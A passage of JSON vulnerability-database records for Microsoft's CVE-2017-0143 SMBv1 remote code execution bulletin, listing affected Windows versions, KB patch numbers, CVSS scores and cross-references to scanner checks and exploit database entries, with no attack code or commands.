{"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T12:46:46", "differentElements": ["msAffectedSoftware"], "edition": 72}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-20T14:58:45", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-20T14:58:45", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-20T14:58:45", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012214", "KB4012606", "KB4012213", "KB4013198", "KB3210721", "KB4012216", "KB3177186", "KB3205409", "KB3205401", "KB4012212", "KB4013429", "KB4012598", "KB3213986", "KB3212646", "KB4012217", "KBMS16-110, 3187754", "KB3210720", "KB4012215"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T14:58:45", "differentElements": ["msAffectedSoftware"], "edition": 73}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": 